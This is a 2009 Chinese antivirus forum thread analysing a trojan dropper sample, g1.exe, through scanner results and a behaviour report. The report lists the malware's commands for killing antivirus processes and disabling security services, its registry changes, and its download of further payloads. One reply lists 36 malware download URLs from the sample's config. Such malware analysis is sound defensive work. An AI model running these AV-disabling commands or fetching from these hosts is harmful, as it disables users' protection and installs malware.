收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 20090329 卡巴高启发1个
12
返回列表 发新帖
楼主: killloop
 收起左侧

[可疑文件] 20090329 卡巴高启发1个

[复制链接]
littlecho
发表于 2009-3-30 04:23:17 | 显示全部楼层
Kaspersky
Internet Security 2009
拒絕存取
無法擷取要求的網址

當試著擷取網址:

http://d1.741239.com/01/g1.exe

發生以下錯誤:

要求的物件感染下列病毒: Trojan.Win32.AntiAV.asq


若您認為這不正確,請連絡服務供應商。
產生於:
Mon Mar 30 04:22:54 2009
Kaspersky Internet Security 2009
回复

举报

ledled
发表于 2009-3-30 09:27:28 | 显示全部楼层
Name: Packed/Upack
Type: Sequence

Description:


Files:
c:\users\administrator\desktop\g1.exe
回复

举报

will
发表于 2009-3-30 11:05:10 | 显示全部楼层
MD5 Hash:       0e1406899b6101fb28e65286f7171f1c
Behavior:       1.g1.exe创建以下文件:
                    %Windir%\system32\killdll.dll
                    %Windir%\system32\updater.exe
                2.g1.exe调用Rundll32.exe加载killdll.dll
                    (1)rundll32.exe获取Debug权限,创建以下文件:
                        %Windir%\system32\drivers\aec.sys
                        %Windir%\system32\drivers\asyncmac.sys
                    (2)rundll32.exe修改IFEO,劫持瑞星、江民、卡巴、金山、McAfee、赛门铁克、Eset等一些杀毒软件软件,以及QQ医生、AnriARP等安全软件
                    (3)rundll32.exe调用cmd.exe,执行以下命令,关闭一些安全软件的进程,禁用一些安全软件的服务:
                        taskkill /f /t /im avp.exe
                        taskkill /im ekrn.exe /f
                        taskkill /im avp.exe /f
                        sc config VSSERV start= disabled
                        sc config scan start= disabled
                        sc config LIVESRV start= disabled
                        sc config XCOMM start= disabled
                        sc config Mcshield start= disabled
                        sc config mcmscsvc start= disabled
                        sc config McShield start= disabled
                        sc config McProxy start= disabled
                        sc config MpfService start= disabled
                        sc config McNASvc start= disabled
                        sc config avp start= disabled
                        sc config ekrn start= disabled
                        sc config RavCCenter start= disabled
                        sc config RsRavMon start= disabled
                        sc config RavTray start= disabled
                        sc config RsScanSrv start= disabled
                        sc config RavTask start= disabled
                    (4)rundll32.exe删除以下注册表项下所有值:
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
                        HKEY_LOCAL_MACHINE\SOFTWARE\KasperskyLab\protected\AVP8\CKAHUM\LastSet
                3.g1.exe运行updater.exe
                    (1)updater.exe创建注册表值:
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
                        Ferrari=%Windir%\system32\scvhost.exe
                    (2)updater.exe访问http://g.sf2652.com/xfz.txt,下载其中的恶意软件,保存到%temp%\1*******_xeex.exe,并运行
                4.g1.exe自删除
Category:       TrojanDropper
Danger Index: ★★★★☆
回复

举报

小小爬蔷虎
发表于 2009-3-30 11:10:13 | 显示全部楼层
nod32 3.0 3月29日病毒库 miss
回复

举报

Sebastian
发表于 2009-3-30 11:21:33 | 显示全部楼层
原帖由 will 于 2009-3-30 11:05 发表
MD5 Hash:       0e1406899b6101fb28e65286f7171f1c
Behavior:       1.g1.exe创建以下文件:
                    %Windir%\system32\killdll.dll
                    %Windir%\system32\updater.exe
          ...


[file]
url0=
url1=http://u8.ggov88.com/sb/ko.exe
url2=http://u1.ggov88.com/la/L2.exe
url3=http://u1.ggov88.com/la/L3.exe
url4=http://u1.ggov88.com/la/L4.exe
url5=http://u1.ggov88.com/la/L17.exe
url6=http://u2.ggov88.com/lm/S8.exe
url7=http://u2.ggov88.com/lm/S10.exe
url8=http://u2.ggov88.com/lm/S1.exe
url9=http://u2.ggov88.com/lm/S3.exe
url10=http://u2.ggov88.com/lm/S15.exe
url11=http://u2.ggov88.com/lm/S9.exe
url12=http://u3.ggov88.com/gz/G3.exe
url13=http://u3.ggov88.com/gz/G10.exe
url14=http://u3.ggov88.com/gz/G1.exe
url15=http://u3.ggov88.com/gz/G5.exe
url16=http://u3.ggov88.com/gz/G31.exe
url17=http://u3.ggov88.com/gz/G4.exe
url18=http://u3.ggov88.com/gz/G36.exe
url19=http://u3.ggov88.com/gz/G37.exe
url20=http://u3.ggov88.com/gz/G35.exe
url21=http://u3.ggov88.com/gz/G33.exe
url22=http://u3.ggov88.com/gz/G32.exe
url23=http://u3.ggov88.com/gz/G14.exe
url24=http://u3.ggov88.com/gz/G15.exe
url25=http://u3.ggov88.com/gz/G11.exe
url26=http://u3.ggov88.com/gz/G12.exe
url27=http://u3.ggov88.com/gz/G9.exe
url28=http://u9.ggov88.com/cj/1a.exe
url29=http://u9.ggov88.com/cj/a2.exe
url30=http://u9.ggov88.com/cj/a10.exe
url31=http://u9.ggov88.com/cj/a6.exe
url32=http://u9.ggov88.com/cj/csj1.exe
url33=http://u9.ggov88.com/cj/q1.exe
url34=http://u9.ggov88.com/cj/q2.exe
url35=http://u9.ggov88.com/cj/a8.exe
count=36


红伞miss1

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

上雕的口
发表于 2009-3-30 11:39:31 | 显示全部楼层
看不懂,,上面都是牛人
回复

举报

328397663
发表于 2009-3-30 12:55:30 | 显示全部楼层
15楼

csj1.exe - Trojan-Downloader.Win32.Agent.bpsl

New malicious software was found in this file. It's detection will be included in the next update. Thank you for your help.
回复

举报

zzh7208 该用户已被删除
发表于 2009-3-30 16:13:59 | 显示全部楼层
看不懂,书读的少。
回复

举报

12
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-12-29 15:45 , Processed in 0.074773 second(s), 5 queries , Redis On.

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表